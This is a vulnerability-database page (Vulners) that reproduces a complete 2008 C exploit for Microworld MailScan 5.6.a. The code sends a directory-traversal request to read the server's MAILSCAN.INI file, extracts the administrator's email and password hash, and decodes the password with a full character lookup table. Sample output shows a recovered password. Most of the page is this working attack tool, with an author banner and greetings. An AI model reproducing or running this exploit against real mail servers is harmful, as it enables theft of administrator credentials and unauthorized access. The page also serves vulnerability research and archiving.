Vulners
Lucene search
Microworld Mailscan 5.6.a Password Reveal Exploit
/*
----------------------------------------------------------------------------------------------
_____ ____
/ ___/___ _____/ __ \___ _ __
\__ \/ _ \/ ___/ / / / _ \ | / /
___/ / __/ /__/ /_/ / __/ |/ /
/____/\___/\___/_____/\___/|___/
[2008] SecurityDevelopment.net
Author: SlaYeR
Date: 25. Aug. 2008
Email: [email protected]
Website: www.securitydevelopment.net
IRC: dragon.overfl0w.org #securitydevelopment.net
----------------------------------------------------------------------------------------------
Exploit based on the advisory from Oliver Karow @
http://securityvulns.com/Udocument375.html
- MailScan for Mail Servers
* Version: 5.6.a with espatch1
* Win32 Platform
Other Mailscan Products, Versions, also, if available
for other platforms, were not tested.
I used the Directory Traversal methode to access the ini file of mailscan
application to gain some importend data.
After some research i found out that the password algorithm was extreamly
weak. So i decided to code a exploit for it.
15. Aug. 2008 - Advisory release
20. Aug. 2008 - SlaYeR founds out about the advisory
21. Aug. 2008 - Found out about the ini file
22. Aug. 2008 - Found out about the weak algorithm and coded a sploit for it.
25. Aug. 2008 - Private version done.
04. Sep. 2008 - Hotfix released by Microworld.
09. Sep. 2008 - Public release
Some special greets to:
Dams - He helped me with some stupid errors inside the decode_hash function
JGS - He helped me with the spliting hash part
Mikke8 - He didn't helped me but i like hem;)
Team Ph0enix - Cuz they Own
----------------------------------------------------------------------------------------------
Example:
_____ ____
/ ___/___ _____/ __ \___ _ __
\__ \/ _ \/ ___/ / / / _ \ | / /
___/ / __/ /__/ /_/ / __/ |/ /
/____/\___/\___/_____/\___/|___/
[2008] SecurityDevelopment.net
- Microworld Mailscan 5.6.a password reveal exploit -
Coded by: SlaYeR
[!] Targeting 192.168.1.111:10443
[!] Building magic string!
[!] Connected to host!
[!] Building request!
[!] Opening target!
[+] SERVER: MailScan 5.6a
[+] ADMIN: [email protected]
[+] HASH: GJBIAHALBCHIBJGJGGAEBMAFBIGGAGGKAIBJHLBMAEBJDHAPBH
[+] PASS: "sl@y3r"-owns-m!cr0word|\
[+] Done!
----------------------------------------------------------------------------------------------
*/
#include <stdio.h>
#include <windows.h>
#include <wininet.h>
#pragma comment(lib, "wininet")
#pragma comment(lib,"ws2_32")
char *SECDEV_ASCII=
" _____ ____ \n"
" / ___/___ _____/ __ \\___ _ __\n"
" \\__ \\/ _ \\/ ___/ / / / _ \\ | / /\n"
" ___/ / __/ /__/ /_/ / __/ |/ / \n"
" /____/\\___/\\___/_____/\\___/|___/ \n"
" [2008] SecurityDevelopment.net\r\n"
"\r\n"
" - Microworld Mailscan 5.6.a password reveal exploit -\r\n"
" Coded by: SlaYeR\r\n"
" \r\n\r\n";
int decode_hash(char * string);
int Count;
int exploit(char *url,char *port);
int main(int argc, char *argv[])
{
char *url = argv[1];
char *port = argv[2];
printf(SECDEV_ASCII);
if( argc <= 2 )
{
printf(" Usage: %s <IP> <PORT>\n",argv[0]);
return 0;
}
else
{
exploit(url,port);
}
return 0;
}
int exploit(char *url,char *port)
{
printf("[!] Targeting %s:%s\n",url,port);
HINTERNET httpopen, openurl;
char buffer2[1024];
DWORD read;
char *check;
char *string1 = "http://";
char *string2 = "/../../../../PROGRA~1/MailScan/MAILSCAN.INI";
char bigbuffer[1025];
char buffer3[1025];
char buffer4[1025];
char buffer5[1025];
char buffer6[1025];
if(httpopen = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0))
{
printf("[!] Building request!\n");
memset(bigbuffer,0,1025);
memcpy(bigbuffer,string1,strlen(string1));
memcpy(bigbuffer+strlen(bigbuffer),url,strlen(url));
memcpy(bigbuffer+strlen(bigbuffer),":",strlen(":"));
memcpy(bigbuffer+strlen(bigbuffer),port,strlen(port));
memcpy(bigbuffer+strlen(bigbuffer),string2,strlen(string2));
}
else
{
printf("[-] Error building request!\n");
InternetCloseHandle(httpopen);
CloseHandle(buffer2);
return 0;
}
printf("[!] Trying to connect @ %s:%s\n",url,port);
if(openurl = InternetOpenUrl(httpopen, bigbuffer, NULL, NULL,
INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, NULL))
{
printf("[!] Connected to host!\n");
}
else
{
printf("[-] Error while connecting! \n");
InternetCloseHandle(httpopen);
InternetCloseHandle(openurl);
CloseHandle(buffer2);
return 0;
}
if(InternetReadFile(openurl, buffer2, sizeof(buffer2), &read))
{
if(check = strstr(buffer2, "[General]"))
{
check = strstr(buffer2, "UserPassword=");
sscanf(check, "UserPassword=%s ", buffer3);
check = strstr(buffer2, "AdminEmailId=");
sscanf(check, "AdminEmailId=%s ", buffer4);
check = strstr(buffer2, "ProductName=");
sscanf(check, "ProductName=%s ", buffer5);
check = strstr(buffer2, "Version=");
sscanf(check, "Version=%s ", buffer6);
}
if( check==NULL )
{
printf("[-] Server not vuln :(\n");
}
else
{
printf("[+] SERVER: %s %s\n",buffer5,buffer6);
printf("[+] ADMIN: %s\n",buffer4);
printf("[+] HASH: %s\n",buffer3);
printf("[+] PASS: ");
char bufferfiller[sizeof(buffer3)];
char temp[1025];
memset(bufferfiller,0,sizeof(buffer3));
for (int i=0;i < strlen(buffer3); i++)
{
Count++;
sprintf(temp,"%c",buffer3[i]);
memcpy(bufferfiller+strlen(bufferfiller),temp,strlen(temp));
if(Count == 2)
{
char buf[255];
memset(buf,0,sizeof(255));
sprintf(buf,"%s",bufferfiller);
decode_hash(buf);
memset(bufferfiller,0,1025);
Count = 0;
}
}
printf("\n[+] Done!\n");
}
}
else
{
printf("[-] Server not vuln :(\n");
}
InternetCloseHandle(httpopen);
InternetCloseHandle(openurl);
CloseHandle(buffer2);
return 0;
}
int decode_hash(char * string)
{
// Yes it token me allot of work to wrote this down... (only default
charset)
// if you want more just do it by yourself
if( strcmp( string, "DA" ) == 0 ){printf("{");} if( strcmp( string, "DG"
) == 0 ){printf("}");}
if( strcmp( string, "BH" ) == 0 ){printf("|");} if( strcmp( string, "HB"
) == 0 ){printf(":");}
if( strcmp( string, "GJ" ) == 0 ){printf("\"");} if( strcmp( string, "HH"
) == 0 ){printf("<");}
if( strcmp( string, "HF" ) == 0 ){printf(">");} if( strcmp( string, "HE"
) == 0 ){printf("?");}
if( strcmp( string, "BA" ) == 0 ){printf("[");} if( strcmp( string, "BG"
) == 0 ){printf("]");}
if( strcmp( string, "BH" ) == 0 ){printf("\\");} if( strcmp( string, "HA"
) == 0 ){printf(";");}
if( strcmp( string, "GM" ) == 0 ){printf("'");} if( strcmp( string, "GH"
) == 0 ){printf(",");}
if( strcmp( string, "GF" ) == 0 ){printf(".");} if( strcmp( string, "GE"
) == 0 ){printf("/");}
if( strcmp( string, "DF" ) == 0 ){printf("~");} if( strcmp( string, "GK"
) == 0 ){printf("!");}
if( strcmp( string, "AL" ) == 0 ){printf("@");} if( strcmp( string, "GI"
) == 0 ){printf("#");}
if( strcmp( string, "GP" ) == 0 ){printf("$");} if( strcmp( string, "GO"
) == 0 ){printf("%");}
if( strcmp( string, "BF" ) == 0 ){printf("^");} if( strcmp( string, "GN"
) == 0 ){printf("&");}
if( strcmp( string, "GB" ) == 0 ){printf("*");} if( strcmp( string, "GD"
) == 0 ){printf("(");}
if( strcmp( string, "BE" ) == 0 ){printf("_");} if( strcmp( string, "GA"
) == 0 ){printf("+");}
if( strcmp( string, "GG" ) == 0 ){printf("-");} if( strcmp( string, "HG"
) == 0 ){printf("=");}
if( strcmp( string, "AK" ) == 0 ){printf("a");} if( strcmp( string, "AJ"
) == 0 ){printf("b");}
if( strcmp( string, "AI" ) == 0 ){printf("c");} if( strcmp( string, "AP"
) == 0 ){printf("d");}
if( strcmp( string, "AO" ) == 0 ){printf("e");} if( strcmp( string, "AN"
) == 0 ){printf("f");}
if( strcmp( string, "AM" ) == 0 ){printf("g");} if( strcmp( string, "AD"
) == 0 ){printf("h");}
if( strcmp( string, "AC" ) == 0 ){printf("i");} if( strcmp( string, "AB"
) == 0 ){printf("j");}
if( strcmp( string, "AA" ) == 0 ){printf("k");} if( strcmp( string, "AH"
) == 0 ){printf("l");}
if( strcmp( string, "AG" ) == 0 ){printf("m");} if( strcmp( string, "AF"
) == 0 ){printf("n");}
if( strcmp( string, "AE" ) == 0 ){printf("o");} if( strcmp( string, "BL"
) == 0 ){printf("p");}
if( strcmp( string, "BK" ) == 0 ){printf("q");} if( strcmp( string, "BJ"
) == 0 ){printf("r");}
if( strcmp( string, "BI" ) == 0 ){printf("s");} if( strcmp( string, "BP"
) == 0 ){printf("t");}
if( strcmp( string, "BO" ) == 0 ){printf("u");} if( strcmp( string, "BN"
) == 0 ){printf("v");}
if( strcmp( string, "BM" ) == 0 ){printf("w");} if( strcmp( string, "BD"
) == 0 ){printf("x");}
if( strcmp( string, "BC" ) == 0 ){printf("y");} if( strcmp( string, "BB"
) == 0 ){printf("z");}
if( strcmp( string, "HK" ) == 0 ){printf("1");} if( strcmp( string, "HJ"
) == 0 ){printf("2");}
if( strcmp( string, "HI" ) == 0 ){printf("3");} if( strcmp( string, "HP"
) == 0 ){printf("4");}
if( strcmp( string, "HO" ) == 0 ){printf("5");} if( strcmp( string, "HN"
) == 0 ){printf("6");}
if( strcmp( string, "HM" ) == 0 ){printf("7");} if( strcmp( string, "HD"
) == 0 ){printf("8");}
if( strcmp( string, "HC" ) == 0 ){printf("9");} if( strcmp( string, "HL"
) == 0 ){printf("0");}
if( strcmp( string, "GC" ) == 0 ){printf(")");} if( strcmp( string, "GL"
) == 0 ){printf(" ");}
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Sep 2008 00:00Current
7.1High risk
Vulners AI Score7.1